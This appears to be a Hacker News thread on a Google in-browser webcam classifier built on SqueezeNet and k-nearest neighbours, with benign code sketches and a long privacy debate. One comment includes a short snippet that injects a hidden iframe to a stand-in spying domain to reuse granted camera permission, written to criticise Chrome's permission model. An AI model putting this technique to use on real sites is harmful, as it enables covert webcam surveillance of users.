We do not send any webcam or audio data back to a server; all of the computation is entirely client-side. The storage API requests are just downloading the weights of a pretrained model.
We're thinking about releasing a blog post explaining the technical details of this project. Would people be interested?
We're using SqueezeNet (https://github.com/DeepScale/SqueezeNet), which is similar to Inception (trained on the same ImageNet dataset) but much smaller - 5MB instead of Inception's 100MB - and inference is much quicker.
The application takes webcam frames and runs them through SqueezeNet, producing a 1000-D logits vector for each frame. These can be thought of as unnormalized probabilities over ImageNet's 1000 classes.
During the collection phase, we accumulate these vectors for each class in browser memory; during inference, we pass the frame through SqueezeNet and run k-nearest neighbors to find the class with the most similar logits vectors. KNN is fast because we vectorize it as one large matrix multiplication.
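To make that concrete, here's a minimal CPU sketch of the k-NN step (all names hypothetical, not the project's actual code; in the demo the stored vectors are stacked into a matrix so the similarity search becomes one big matmul):

    const NUM_CLASSES = 3;

    function knnPredict(
      stored: number[][], // one 1000-D logits vector per collected frame
      labels: number[],   // class index (0..2) for each stored frame
      query: number[],    // logits for the current webcam frame
      k = 10,
    ): number {
      const norm = (v: number[]) => Math.sqrt(v.reduce((s, x) => s + x * x, 0));
      const qn = norm(query);
      // Cosine similarity against every stored vector; with the rows
      // stacked into a matrix, this loop is a single matrix-vector product.
      const sims = stored.map((row, i) => ({
        sim: row.reduce((s, x, j) => s + x * query[j], 0) / (norm(row) * qn),
        label: labels[i],
      }));
      sims.sort((a, b) => b.sim - a.sim); // most similar first
      const votes = new Array(NUM_CLASSES).fill(0);
      for (const { label } of sims.slice(0, k)) votes[label]++;
      return votes.indexOf(Math.max(...votes)); // majority vote among the k neighbors
    }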
I'm curious why you've used a different classification algorithm on top of a neural network. I would expect that a neural network on top of a pretrained network could give similar results, with the benefit of simpler code. Is performance the reason?
Training a neural network on top would require a "proper" training phase, and finding the right hyperparameters that work everywhere turned out to be tricky. That's actually what we did originally; in the blog post we'll try to show demos of each approach and explain why they didn't work.
KNN also makes training "instant", and the code much simpler.
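For contrast, here's a toy sketch of the simplest version of the "train a head on top" approach: a softmax layer over the logits, trained by SGD. (Hypothetical code, not what we shipped; note the learning rate and epoch count, which would somehow have to work for every user, webcam, and lighting condition.)

    function trainSoftmaxHead(
      xs: number[][], ys: number[],           // stored logits vectors and class ids
      numClasses = 3, lr = 0.01, epochs = 50, // hyperparameters that must work everywhere
    ): number[][] {
      const dim = xs[0].length;
      const W = Array.from({ length: numClasses }, () => new Array(dim).fill(0));
      for (let e = 0; e < epochs; e++) {
        for (let i = 0; i < xs.length; i++) {
          const scores = W.map((w) => w.reduce((s, wj, j) => s + wj * xs[i][j], 0));
          const m = Math.max(...scores);
          const exps = scores.map((s) => Math.exp(s - m)); // numerically stable softmax
          const Z = exps.reduce((a, b) => a + b, 0);
          exps.forEach((p, c) => {
            const grad = p / Z - (c === ys[i] ? 1 : 0); // cross-entropy gradient w.r.t. score
            for (let j = 0; j < dim; j++) W[c][j] -= lr * grad * xs[i][j];
          });
        }
      }
      return W;
    }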
By the way, I think your software could become very popular on the Raspberry Pi, because it would be very cheap and fun to use for all sorts of applications (e.g. home automation).
There's something fantastically entertaining about this. It's stupidly simple (from the outside) but interacting with the computer in such a different way is weirdly fun.
It's like when you turn on a camera and people can see themselves on a TV. A lot of people can't help but make faces at it.
Why does it not work in Edge? Please keep the web open; don't make stuff that doesn't work in a modern browser. Also, always give an option to try it anyway.
Pretty neat! A good overview without being overwhelming right off the bat. It would be cool if they showed off common pitfalls like overfitting, or even segued into general statistics!
How long before I can teach my computer gestures that are mapped to real computer functions? For example, scroll up/down, switch apps, save document, cut/copy/paste, etc.
One could probably map each gesture to a regular USB device that acts as a second keyboard and mouse? The hard part is identifying enough unique gestures?
I think that’s infrared but the same idea. That never quite worked. Also, Leap didn’t continue to refine their hardware for consumers. They have next generation hardware that’s going directly into VR headsets, but you can’t buy it.
Seems to me that you can buy the SDK[0] (which is not much more than a Controller and a bracket to hold it against your VR headset of choice), so at least they've made some progress since 2014.
[0]: http://store-eur.leapmotion.com/products/universal-vr-develo...
Ah, sorry. There are three coloured buttons. When you hold one, the site takes a series of photos from your webcam and assigns them to that "class". Then it'll train and start classifying your video input live.
It's a pretty neat way of creating a reasonable training set of 3 classes.
It works great because they're using a state-of-the-art model (SqueezeNet, https://github.com/DeepScale/SqueezeNet), and also because the samples/experiments you do are often only on yourself, in the same lighting, same clothes, etc. That gives a nice idealized playground environment that mostly eliminates annoying details like these.
There are 3 default classes, and you train each class (e.g. hand waving, sitting still, etc.) by taking examples of it using your camera. You then map the input data from your camera to some output data: e.g. if I used the green button to take photos of me waving, display a GIF of a cat that's waving. Instead of a GIF you can use sound too.
The value-add of this demo is amazing; it's going to be many people's first approachable experience of ML, or things just like it will be. I expect a lot more of this stuff to appear in UI/UX. It's fun, intuitive, and a game changer: a shift away from dumb screens toward fully interactive machines with their own knowledge graph.
To use Azure, which places too high a bar on students. I mean, I've tried to argue for graduated restrictions (basically, students with .edu emails should be able to do some things without entering a credit card number), but the fact that this isn't possible suggests it isn't a priority for Azure.
Google says this runs in your browser, so there's little infrastructure cost for this demo, right?
Can you clarify what you did with it? I'd love to start dabbling in solving problems with ML, but am a bit intimidated by getting started. Is it fairly easy for a novice to do the things you did?
Does anyone know what this uses under the hood? I loved the demo, but I would like a similarly easy way to get started locally with Python, for example.
Is there an ML library that can easily start capturing images from the webcam so you can play around with training a model?
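In the browser, the capture side alone is small enough to sketch with the standard getUserMedia API (hypothetical helper name below); for a local Python setup, OpenCV's cv2.VideoCapture(0) is the usual equivalent:

    // Grab `count` frames from the webcam as raw ImageData.
    async function captureFrames(count: number): Promise<ImageData[]> {
      const stream = await navigator.mediaDevices.getUserMedia({ video: true });
      const video = document.createElement("video");
      video.srcObject = stream;
      await video.play();
      const canvas = document.createElement("canvas");
      canvas.width = video.videoWidth;
      canvas.height = video.videoHeight;
      const ctx = canvas.getContext("2d")!;
      const frames: ImageData[] = [];
      for (let i = 0; i < count; i++) {
        ctx.drawImage(video, 0, 0);               // copy the current frame
        frames.push(ctx.getImageData(0, 0, canvas.width, canvas.height));
        await new Promise((r) => setTimeout(r, 100)); // sample at ~10 fps
      }
      stream.getTracks().forEach((t) => t.stop()); // release the camera
      return frames;
    }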
Your unbridled optimism even in the face of reality has inspired me to give this a shot, thank you! It seems to be based on Weka, so it should be good.
On a first run, I don't really see how to record images from the webcam; it just says "waiting for samples". I'll play around some more and hopefully figure it out. Thanks again.
EDIT: Ah, there's a detailed walkthrough which seems to work well!
Be aware that, at least in Chrome, once you give teachablemachine.withgoogle.com permission to use your camera, it keeps that permission until you revoke it and can use your camera without asking again, including from iframes. In other words, every ad and analytics script from Google could start injecting camera access.
I wish Chrome would give the option to grant permission only "this time", and I wish it didn't allow camera access from cross-domain iframes.
Are you serious? Do you realize that Chrome is also written by Google, and they could theoretically already run arbitrary code on your computer? The potential reputation damage and legal risk for Google would be way too high to pull off something like that.
If this happened, the Google Chrome tab would show a camera icon. Many webcams also have LEDs that indicate when they are active.
Google could theoretically release compromised versions of Google Chrome and only use the permission on devices where webcam LEDs are unlikely (e.g. smartphones), but this is going deep into tin-foil-hat territory.
That's not helpful. The pictures would already have been taken and uploaded to servers without my permission, regardless of whether or not I wanted my picture taken or what's visible (contracts, trade secrets, people in various states of undress).
Also, this isn't about Google spying. It's about Chrome's bad camera permission model; any company can abuse it.
Google ads and analytics inject JavaScript, which means they can insert iframes for any domain they want. If they injected <iframe src="https://teachablemachine.withgoogle.com/spyonuserwithcamera" />, they'd be able to use your camera from the ad or analytics script without asking for permission again.
Of course I'm not suggesting Google would actually do that, but some other company might make seeamazingcamerameme.com to get users to turn on their camera for that domain, and then afterwards create iframes for seeamazingcamerameme.com/spy.
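To make the scenario concrete, here's a hypothetical sketch of what such an injected script could do under the permission model described above:

    // Injected into the host page by an ad/analytics script:
    const frame = document.createElement("iframe");
    frame.style.display = "none";                       // invisible to the user
    frame.src = "https://seeamazingcamerameme.com/spy"; // origin the user once permitted
    document.body.appendChild(frame);

    // Inside the /spy page, this can resolve without a new prompt,
    // because the grant was made to the whole origin earlier:
    navigator.mediaDevices.getUserMedia({ video: true })
      .then((stream) => { /* frames could now be captured and uploaded */ });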
That's one of those arguments that may attack the parent in isolation, but it makes absolutely no sense in the context of the thread they were replying to.
Because if you assume an attacker has control over DNS, the security model of granting permission per domain is broken anyway, and the initial concern with granting Google this access is already subsumed by your general paranoia.
It works on mobile; it's just slow. Every time we read and write from memory we have to pack and unpack 32-bit floats as 4 bytes without bit-shifting operators >.>
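For the curious, one classic arithmetic-only packing trick (fract and floor only, since GLSL ES 2.0 has no bitwise operators) spreads a value in [0, 1) across four byte channels. This is a sketch in TypeScript of the general idea, not our actual shader code:

    const fract = (x: number) => x - Math.floor(x);

    // Split v in [0, 1) across four channels of increasing precision.
    function pack(v: number): [number, number, number, number] {
      let [r, g, b, a] = [v, v * 255, v * 65025, v * 16581375].map(fract);
      // Subtract the part each channel's next-finer neighbour already carries.
      r -= g / 255; g -= b / 255; b -= a / 255;
      return [r, g, b, a];
    }

    function unpack([r, g, b, a]: [number, number, number, number]): number {
      return r + g / 255 + b / 65025 + a / 16581375;
    }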
Hmm. I wonder if one could train this on dick pics and embed it into popular messenger apps client-side... "this picture was classified as a penis", to counter morons sending their dick as a first message.
Claims like these make privacy-focused efforts less valuable, and I wish people wouldn't make them.
What value is there in taking care to store biometric data only locally, in a separate chip inaccessible even to the OS, if people will simply claim it's equivalent to keeping a remote database of millions of faces?
People will be much less likely to make those claims if you clearly state where the data is being stored. This article and their project page don't mention anything about privacy.
People need to ask the question before making assumptions. In the case of Apple, they said it directly in the presentations of FaceID and TouchID, IIRC. Yet people made these claims anyway. For this project, they also state it clearly on the page:
> Are my images being stored on Google servers?
> No. All the training is happening locally on your device.
Where does it clearly state that? I couldn't find anything in the linked article, the GitHub repo, or teachablemachine.withgoogle.com.
But I do agree that people need to ask the question before making assumptions. Sadly, the two popular mindsets are either to not think about privacy at all, or to believe that everything is infringing on your privacy.
Ah, I didn't get that far because it requested the webcam. I'd prefer that they state it before the request, but an FAQ at the start of the project is good enough.
Facebook beat them to it... that's the whole reason for tagged images, IMO. Then they can relate identities to each other and, combined with EXIF GPS data, track people's movements over time.
HN discussions tend to devolve into rants about privacy. A lot of the same discussions recur here, and they overwhelm discussion of the actual technology.
Also, my own personal privacy is less secure if it's a relative inconvenience for employers: if everyone but me gives up their privacy, there's more pressure on me to follow suit.
The argument even doubles back on itself. If these comments aren't interesting to you... don't read them. Embrace tree-style collapsible comments.
You can learn lots of interesting things by invading people's privacy.
I responded to the argument you linked. You're avoiding a more interesting discussion on the topic. Push the [-] button and move on. Your comment is blatantly hypocritical:
"Every time X is updated people complain about X; those people ignore the details of the update."
"Every time people complain about X other people complain about them complaining about X; those people ignore the details of the complaint."
That's because the privacy implications of a technology should be part of the discussion of that technology... technology is not neutral; the way it's used and its privacy implications are significant.
I am pretty sure that Apple does not save your image data in any database. Apple is really trying to differentiate itself on privacy.
Also, I don't think that this sends any data to Google, since it trains the neural net in the browser. You could even verify this yourself by looking at the source code.